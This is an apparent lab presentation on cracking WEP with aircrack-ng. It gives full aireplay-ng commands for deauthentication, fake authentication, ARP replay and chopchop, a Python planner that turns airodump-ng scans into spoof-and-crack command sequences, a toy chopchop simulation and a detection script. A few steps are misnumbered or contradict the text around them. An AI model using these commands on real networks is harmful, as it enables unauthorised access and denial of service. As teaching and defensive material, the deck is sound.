
WEP Crack Using

aircrack-ng
Arunabh Das
Content
 Part 1 - Background
 WEP
 Encryption
 Authentication
 Vulnerabilities
 Part 2 - Attack Experiment
 Cracking WEP Keys
 Test Environment
 Network Topology
 Hardware & Software
 The Attack
 Observations
 Part 3 - Conclusion
 Problems Encountered
 Detection & Prevention
 Conclusion
 References
WEP Encryption
 Wired Equivalent Privacy
 64-bit and 128-bit keys: a 40-bit or 104-bit secret key plus a 24-bit IV that is sent in the clear with every frame
 Utilizes RC4 (keyed with IV || secret key) for confidentiality and CRC-32 as the integrity check value (ICV)

WEP Authentication

 Open System Authentication

http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html
WEP Authentication

 Shared Key Authentication

http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html
WEP Vulnerability
 Static keys: every station shares the same long-lived key
 Short IV (24 bits): the IV space runs out on a busy network, so keystreams are reused, and certain "weak" IVs leak key bytes
 Susceptible to statistical analysis based attacks on captured IVs (FMS, KoreK and PTW; aircrack-ng uses PTW)
 CRC-32 is linear, so an encrypted frame can be modified and its ICV fixed up without the key (the basis of the chopchop attack)
Network Topology
(figure: attacker <-> Wireless AP <-> victim)
H/W and S/W requirements
Attacker                                   Victim
OS: Ubuntu 8.04                            OS: Windows XP
NIC: iwl4965 / Atheros AR5007 b/g          NIC: D-Link WUA-2340 USB adaptor
Software: Kismet, Airodump, Aireplay,      Software: D-Link Wireless Connection Manager
          Airjack

Wireless AP: Linksys WRT54GL
Types of attacks using aireplay
 It currently implements multiple different attacks:
 Attack 0: Deauthentication
 Attack 1: Fake Authentication
 Attack 2: Interactive Packet Replay
 Attack 3: ARP Request Replay Attack
 Attack 4: Korek Chopchop attack
 Attack 5: Fragmentation attack
 Attack 6: Caffe-latte attack
 Attack 7: Client-oriented fragmentation attack

Source - http://www.aircrack-ng.org/doku.php?id=aireplay-ng
Deauthentication
 This attack sends spoofed disassociation/deauthentication frames to one or more clients that are currently associated with a particular access point, forcing the client to disconnect from the AP. On its own it is a denial of service rather than a "man-in-the-middle"; it only becomes one if the attacker also runs a fake AP for the client to reconnect to.
 The reasons for disassociating clients are:
 Generate ARP requests (a reconnecting client usually sends one)
 Force clients to re-authenticate
 Recovering a hidden ESSID
Deauthentication cont.
 Use aireplay-ng to perform the deauth attack
Command:
aireplay-ng -0 1 -a <AP MAC address> -c <client MAC address> ath0
-0 means deauthentication
1 is the number of deauths to send (0 sends them continuously)
-a is the MAC address of the access point
-c is the MAC address of the client to deauth; without -c a broadcast deauth is sent to every client
ath0 is the interface name (ath0 is the madwifi name; with other drivers use the monitor interface airmon-ng reports)
Deauthentication cont.
The MAC addresses of the AP and the client can be obtained by sniffing, e.g. from the BSSID and STATION columns of airodump-ng, or with Wireshark.
The output of the command from the slide above will look like:
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
STMAC is the MAC address of the client. Once the client is deauthenticated, the attacker can spoof the victim's MAC address and inject frames that the AP accepts as coming from that client.
Fake authentication
 Fake authentication lets the attacker perform either type of WEP authentication (open system or shared key) and associate with the AP. Unlike the deauthentication attack it generates no ARP packets; it is only useful when another packet injection attack needs an associated source MAC address and no client is currently connected to the AP.
Fake authentication cont.
 The actual aireplay-ng command:
 aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -y sharedkeyxor ath0
 -1 means fake authentication
 0 is the reassociation timing in seconds (0 authenticates once; a larger value re-associates periodically so the AP does not drop the association)
 -e teddy is the wireless network name (ESSID)
 -a 00:14:6C:7E:40:80 is the access point MAC address
 -h 00:09:5B:EC:EE:F2 is our card's MAC address
 -y sharedkeyxor is the name of the file containing the PRGA xor bits (keystream). This is only used for shared key authentication; open system authentication, which is typical, does not require it. The PRGA xor bits can be obtained by capturing a shared key authentication exchange (e.g. after deauthenticating a real client so it re-authenticates) or from the KoreK chopchop attack.
 ath0 is the wireless interface name
ARP Request Replay attack
 The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs).
 The program listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over.
 Each ARP packet repeated by the access point carries a new IV. It is all these new IVs (and the known plaintext of an ARP frame) that allow aircrack-ng to determine the WEP key.
ARP Request Replay attack cont.
 Basic usage
 aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
 Where:
 -3 means standard ARP request replay
 -b 00:13:10:30:24:9C is the access point MAC address
 -h 00:11:22:33:44:55 is the source MAC address (either an associated client or the one used for fake authentication)
 ath0 is the wireless interface name

ARP Request Replay attack cont.
The output of the above command would be:
 Saving ARP requests in replay_arp-0219-123051.cap
 You should also start airodump-ng to capture replies.
 Read 11978 packets (got 7193 ARP requests), sent 3902 packets...
KoreK chopchop
 This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. The attack does not recover the WEP key itself, but merely reveals the plaintext (and therefore the keystream for that IV).
 Some APs are not vulnerable to this attack (they drop the shortened frames)
KoreK chopchop cont.
 Perform KoreK chopchop with aireplay-ng
 aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0
 -4 means the chopchop attack
 -h 00:09:5B:EC:EE:F2 is the MAC address of an associated client, or your card's MAC if you did fake authentication
 -b 00:14:6C:7E:40:80 is the access point MAC address
 ath0 is the wireless interface name
KoreK chopchop cont.
 Sample output of the above command

 Read 165 packets...

       Size: 86, FromDS: 1, ToDS: 0 (WEP)

            BSSID  =  00:14:6C:7E:40:80
        Dest. MAC  =  FF:FF:FF:FF:FF:FF
       Source MAC  =  00:40:F4:77:E5:C9

       0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.
       0x0010:  0040 f477 e5c9 603a d600 0000 5fed a222  .@.w..`:...._.."
       0x0020:  e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543  ...H......._=..C
       0x0030:  d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873  ....j.....%.[.(s
       0x0040:  16d4 43fb aebb 3ea1 7101 729e 65ca 6905  ..C...>.q.r.e.i.
       0x0050:  cfeb 4a72 be46                           ..Jr.F

 Use this packet ? y
Fragmentation Attack
 This attack, when successful, can obtain 1500 bytes of PRGA (pseudo random generation algorithm output, i.e. the RC4 keystream for one IV). It does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to forge packets with packetforge-ng, which are in turn used for various injection attacks. It requires at least one data packet to be received from the access point in order to initiate the attack.
KoreK chopchop vs. Fragmentation Attack
 The fragmentation attack obtains the full packet length of 1500 bytes of keystream (xor), so a packet of any size can be forged, which is sufficient to create an ARP request. It is extremely fast, but it needs more information, such as the IP address, to launch.
 The chopchop attack does not need any IP information, but it is much slower (up to 256 frames sent to the AP per recovered byte) and the keystream it recovers is limited to the length of the chopped packet.
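The following is an added example, not code from the slides or from aircrack-ng. It ties the WEP Encryption slide (RC4 keyed with IV || secret key, CRC-32 ICV) to the KoreK chopchop attack described above: the "AP" is a function that decrypts with the real key and reports only whether the ICV verifies, and the attacker recovers the keystream for that IV one byte at a time from that single bit, which is exactly the CRC-32 linearity weakness listed under WEP Vulnerability. The 40-bit key, the IV and the ARP body are assumed, constructed values; CRC_TABLE, TOP_TO_INDEX and chop_correction are this example's own names.

```python
import zlib

# Toy WEP, written for this page (not aircrack-ng code): a 40-bit secret
# plus a 24-bit IV key RC4, and a CRC-32 ICV "protects" the plaintext.
# Key, IV and the ARP body in run_demo() are assumed/constructed values.


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (the PRGA output) of `length` bytes for `key`."""
    s = list(range(256))
    j = 0
    for i in range(256):                          # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):                       # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(msg: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(msg).to_bytes(4, "little")


def wep_encrypt(secret: bytes, iv: bytes, msg: bytes) -> bytes:
    body = msg + icv(msg)
    return iv + bytes(p ^ k for p, k in zip(body, rc4(iv + secret, len(body))))


def wep_decrypt(secret: bytes, frame: bytes):
    """What the AP does: decrypt, verify the ICV, return plaintext or None."""
    iv, body = frame[:3], frame[3:]
    plain = bytes(c ^ k for c, k in zip(body, rc4(iv + secret, len(body))))
    return plain[:-4] if icv(plain[:-4]) == plain[-4:] else None


# CRC-32 table (reflected polynomial 0xEDB88320).  Its 256 entries all have
# distinct top bytes, so the table can be inverted by top byte: this is the
# linearity property chopchop exploits.
CRC_TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    CRC_TABLE.append(c)
TOP_TO_INDEX = {t >> 24: j for j, t in enumerate(CRC_TABLE)}


def chop_correction(guess: int) -> bytes:
    """Mask for the last four bytes of a packet whose final byte was chopped:
    XORed in, the ICV verifies again exactly when the chopped plaintext byte
    equals `guess` (follows from the CRC update r' = (r >> 8) ^ T[(r ^ b) & 0xFF])."""
    j = TOP_TO_INDEX[guess ^ 0xFF]
    t = CRC_TABLE[j]
    return bytes([j ^ 0xFF, t & 0xFF, (t >> 8) & 0xFF, (t >> 16) & 0xFF])


def chopchop(frame: bytes, accepts) -> dict:
    """Recover keystream bytes {position: byte} for the frame's IV, using only
    an accept/reject oracle (in the field: does the AP relay the frame?)."""
    iv, cur = frame[:3], bytearray(frame[3:])
    keystream = {}
    while len(cur) > 4:                           # stop at the bare ICV
        pos = len(cur) - 1
        cipher_byte = cur[pos]
        cur = cur[:-1]
        for guess in range(256):
            cand = bytearray(cur)
            for k, d in enumerate(chop_correction(guess)):
                cand[len(cand) - 4 + k] ^= d
            if accepts(iv + bytes(cand)):
                keystream[pos] = cipher_byte ^ guess
                cur = cand                        # a valid packet, one byte shorter
                break
        else:
            raise RuntimeError("no guess accepted: oracle is not an ICV check")
    return keystream


def run_demo():
    """Encrypt a constructed ARP request, then decrypt it without the key."""
    secret = bytes.fromhex("0102030405")           # assumed 40-bit key
    iv = bytes.fromhex("0a0b0c")                   # assumed IV
    arp = bytes.fromhex("aaaa030000000806"         # LLC/SNAP, ethertype ARP
                        "0001080006040001"         # ARP request header
                        "00115b11aa22c0a80164"     # sender MAC/IP (made up)
                        "000000000000c0a80101")    # target MAC/IP (made up)
    frame = wep_encrypt(secret, iv, arp)
    ks = chopchop(frame, lambda f: wep_decrypt(secret, f) is not None)
    recovered = bytes(frame[3 + p] ^ ks[p] for p in sorted(ks))
    return recovered, (arp + icv(arp))[4:]
```

run_demo() returns the recovered plaintext tail next to the real one; they match. The keystream dict is the PRGA that packetforge-ng consumes after a real chopchop (aireplay-ng writes it to a .xor file). The first four bytes are not recovered because the loop stops at the bare ICV; in practice they are the fixed LLC/SNAP header (AA AA 03 00), so chopchop never has to guess them. The cost of up to 256 AP round trips per byte is why the slides call chopchop much slower than the fragmentation attack.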
Flow Chart for Cracking

Source – http://www.aircrack-ng.org/doku.php?id=flowchart#section_7frag_chop-chop_failed
Configuring Environment
Configure Access Point
 Step 1: Set the encryption to WEP and generate keys using a passphrase
 Step 2: Set the SSID and the broadcast channel
 Step 3: Set the Authentication type to Auto (the AP then accepts both open system and shared key authentication)
Installation
 Installation of kismet (steps 1-7: screenshots)
Installation
 Patching of kernel
 Step 1: Note that the 2.6.24 version of the kernel doesn't contain the modules that we need
 Step 2: Install kernel-package libraries
 Step 3: Wait for complete installation of kernel-package libraries
 Step 4: Download the latest version of the kernel using wget
 Step 11: Finding a client that is connected to the AP and the client's MAC address
 Steps 5-55 otherwise: screenshots
Preparatory – Testing Injection
 Step 1: Enable monitor mode on the card
 Step 2: Basic test to determine if the card supports injection
 Step 3: Check a hidden SSID or test against a specific SSID
 Step 4: Create 2 virtual wireless interfaces for the attack test
 Step 5: (screenshot)
Reconnaissance (steps 1-9: screenshots)
Attack Without Deauth (steps 1-13: screenshots)
Iteration 2 – ARP Request Replay with deauthentication request
 Step 1: Taking down the network interface in order to change the MAC
 Step 2: Finding a target AP and the channel it is broadcasting on
 Step 3: Finding a client that is connected to the AP and the client's MAC address
 Step 4: Changing the attacker's MAC address to match the client's (spoofing)
 Step 5: Starting airodump-ng to capture packets, especially weak-IV packets
 Step 6: Monitoring airodump-ng to track the capture rate
 Step 7: Starting aireplay-ng to inject frames
 Step 8: Monitoring the number of ARP requests generated
 Step 9: Sending deauthentication frames to the client
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth)
 Steps 1-2: (screenshots)
 Step 3: Finding a client that is connected to the AP and the client's MAC address
 Step 4: (screenshot)
 Step 5: Starting airodump-ng to capture packets, especially weak-IV packets
 Step 6: Monitoring airodump-ng to track the capture rate
 Step 7: Starting aireplay-ng to inject frames
 Step 8: Monitoring the number of ARP requests generated
 Step 9: Sending deauthentication frames to the client
 Steps 10-14: (screenshots)
 Steps 15-22: Using aircrack-ng to crack the key
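The following is an added example, not from the slides and not part of aircrack-ng. It covers the reconnaissance and attack procedure above (find the target AP and its channel, find an associated client, spoof its MAC or fall back to fake authentication, replay ARP requests, crack) and the aireplay-ng command explanations earlier in the deck: it parses the CSV that airodump-ng writes next to its capture, picks the WEP networks and their clients, and emits the exact argv lists for each step. The sample CSV is constructed (it reuses the AP, client and ESSID from the slides' sample commands); the column layout assumed is the one from the aircrack-ng 1.0 era, so compare the header row against your own airodump-ng output. The interface name, capture prefix and the use of macchanger for spoofing are this example's assumptions.

```python
import csv
import io
import re

# Constructed sample of the CSV that airodump-ng writes alongside its capture
# (<prefix>-01.csv): an access-point block, a blank line, a station block.
# 1.0-era column layout; check the header row of your version.  AP, client
# and ESSID are the ones from the slides; timestamps and counters are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:6C:7E:40:80, 2009-02-19 12:30:51, 2009-02-19 12:35:10,  6,  54, WEP , WEP, OPN,  -45,      123,     1497,   0.  0.  0.  0,   5, teddy, 
00:13:10:30:24:9C, 2009-02-19 12:30:52, 2009-02-19 12:35:10, 11,  54, WPA2, CCMP, PSK,  -70,       88,        0,   0.  0.  0.  0,   6, office, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:0F:B5:34:30:30, 2009-02-19 12:31:02, 2009-02-19 12:35:09,  -60,      812, 00:14:6C:7E:40:80,teddy
00:09:5B:EC:EE:F2, 2009-02-19 12:31:40, 2009-02-19 12:34:00,  -55,       14, (not associated),
"""

MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")


def _block(text):
    """One CSV block -> list of dicts keyed by the stripped header names."""
    rows = list(csv.reader(io.StringIO(text)))
    header = [h.strip() for h in rows[0]]
    return [dict(zip(header, (f.strip() for f in r)))
            for r in rows[1:] if r and MAC_RE.match(r[0].strip())]


def parse_airodump_csv(text):
    """Return (access_points, stations); the blank line separates the blocks."""
    ap_part, _, sta_part = text.partition("\n\n")
    return _block(ap_part), _block(sta_part)


def wep_targets(aps, stations):
    """WEP networks with channel, IVs captured so far and associated clients."""
    out = []
    for ap in aps:
        if "WEP" not in ap["Privacy"]:
            continue
        clients = [s["Station MAC"] for s in stations if s["BSSID"] == ap["BSSID"]]
        out.append({"bssid": ap["BSSID"], "essid": ap["ESSID"],
                    "channel": int(ap["channel"]), "ivs": int(ap["# IV"]),
                    "clients": clients})
    return out


def attack_plan(target, iface, our_mac, prefix="wepcap"):
    """argv lists, in order, for the slides' procedure.  Nothing here runs
    anything; hand each list to subprocess on an authorised engagement."""
    if not MAC_RE.match(our_mac):
        raise ValueError(f"bad MAC: {our_mac}")
    bssid, ch = target["bssid"], str(target["channel"])
    # lock the capture to the AP's channel; writes <prefix>-01.cap / .csv
    steps = [["airodump-ng", "-c", ch, "--bssid", bssid, "-w", prefix, iface]]
    if target["clients"]:
        # Variation 3 on the slides: take the interface down, spoof an
        # associated client's MAC, and replay as that client (no deauth).
        src = target["clients"][0]
        steps += [["ifconfig", iface, "down"],
                  ["macchanger", "-m", src, iface],
                  ["ifconfig", iface, "up"]]
    else:
        # no client to borrow: fake-authenticate our own MAC first (-1 0)
        src = our_mac
        steps.append(["aireplay-ng", "-1", "0", "-e", target["essid"],
                      "-a", bssid, "-h", src, iface])
    steps.append(["aireplay-ng", "-3", "-b", bssid, "-h", src, iface])  # ARP replay
    # PTW attack on the capture; rerun it as the IV count grows
    steps.append(["aircrack-ng", "-z", "-b", bssid, f"{prefix}-01.cap"])
    return steps
```

The WPA2 network in the sample is skipped by wep_targets, and the unassociated station is ignored because its BSSID column reads "(not associated)". With a client present the plan takes the spoofing path and never issues a fake authentication, which is the difference between Variation 3 and the fake-authentication slides; with an empty client list it falls back to -1 0 with our own MAC.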
Observations/Conclusion
 WEP is weak and can be cracked easily
 We were able to crack WEP in x minutes
 WEP encrypted networks should be replaced with WPA2 (AES-CCMP) networks
Detection/Prevention
 An abnormal number of ARP requests (the same encrypted frame replayed hundreds of times a second, and a matching surge of replies with fresh IVs from the AP) is a sign that an attacker is trying to crack the WEP key
 A burst of deauthentication frames aimed at one client is the other visible signature
 Careful monitoring and logging of such events can help administrators detect the attack
 Preventing the attack itself is near impossible while WEP is in use: replay and injection are inherent in the protocol, so the only real fix is to migrate to WPA2
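The following is an added example, not from the slides or any IDS product: detection logic for the signatures just described, run over constructed frame summaries of the kind a monitor-mode sensor could log. The records, thresholds and function names are this example's own; the two MAC addresses are the AP and client from the slides' sample commands.

```python
from collections import Counter, defaultdict

# Constructed frame summaries (not real capture output).  Each record is
# (time_s, kind, src, dst, bssid, iv_hex); 'deauth' management frames carry
# no IV.  MACs are the AP and client from the slides' sample commands.
AP, CLIENT = "00:14:6c:7e:40:80", "00:0f:b5:34:30:30"
# ordinary traffic: one client, a fresh IV on every frame
NORMAL = [(i * 0.5, "data", CLIENT, AP, AP, f"{i:06x}") for i in range(20)]
# aireplay-ng -0: a burst of deauth frames spoofed from the AP to the client
DEAUTH = [(5.0 + i * 0.02, "deauth", AP, CLIENT, AP, None) for i in range(16)]
# aireplay-ng -3: the same captured ARP request (same IV!) replayed 300 times
REPLAY = [(6.0 + i * 0.01, "data", CLIENT, AP, AP, "1e2f30") for i in range(300)]
# ... and the AP's relayed copies, each encrypted under a new IV
REPLIES = [(6.002 + i * 0.01, "data", AP, CLIENT, AP, f"{0x100000 + i:06x}")
           for i in range(300)]
SAMPLE = NORMAL + DEAUTH + REPLAY + REPLIES


def peak_in_window(times, window):
    """Largest number of events inside any `window`-second span."""
    times = sorted(times)
    best = lo = 0
    for hi, t in enumerate(times):
        while t - times[lo] > window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def find_deauth_bursts(frames, window=1.0, threshold=10):
    """bssid -> peak deauth count for BSSIDs above the threshold.  Genuine
    deauths are rare; a burst at one client means aireplay-ng -0 is running."""
    per_bssid = defaultdict(list)
    for t, kind, _src, _dst, bssid, _iv in frames:
        if kind == "deauth":
            per_bssid[bssid].append(t)
    return {b: n for b, ts in per_bssid.items()
            if (n := peak_in_window(ts, window)) > threshold}


def find_iv_reuse(frames, threshold=3):
    """(src, iv) -> count of WEP data frames whose IV repeats.  A real client
    does not re-send an identical frame hundreds of times; ARP replay does."""
    counts = Counter((src, iv) for _t, kind, src, _d, _b, iv in frames
                     if kind == "data")
    return {k: n for k, n in counts.items() if n > threshold}


def find_data_rate_spikes(frames, window=1.0, threshold=50):
    """src -> peak data frames per window above the threshold: catches both
    the injected ARP requests and the AP's flood of fresh-IV replies, i.e.
    the 'abnormal amount of ARP requests' from the slide."""
    per_src = defaultdict(list)
    for t, kind, src, *_ in frames:
        if kind == "data":
            per_src[src].append(t)
    return {s: n for s, ts in per_src.items()
            if (n := peak_in_window(ts, window)) > threshold}


def analyse(frames):
    return {"deauth_bursts": find_deauth_bursts(frames),
            "iv_reuse": find_iv_reuse(frames),
            "rate_spikes": find_data_rate_spikes(frames)}
```

On the constructed sample, analyse(SAMPLE) flags the deauth burst against the AP, the 300-fold reuse of IV 1e2f30 by the client, and a rate spike for both the client (injected requests) and the AP (relayed replies), while analyse(NORMAL) flags nothing. The IV-reuse check is the most specific of the three, because it keys on what the replay attack cannot avoid: re-sending a frame it did not encrypt itself.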
References
[1] “Aireplay-ng”
URL: http://www.aircrack-ng.org/doku.php?id=aireplay-ng
[2] “Computer Security”
URL: http://en.wikipedia.org/wiki/Computer_security
[3] “Exploit (computer security)”
URL: http://en.wikipedia.org/wiki/Exploit_(computer_security)
Questions?
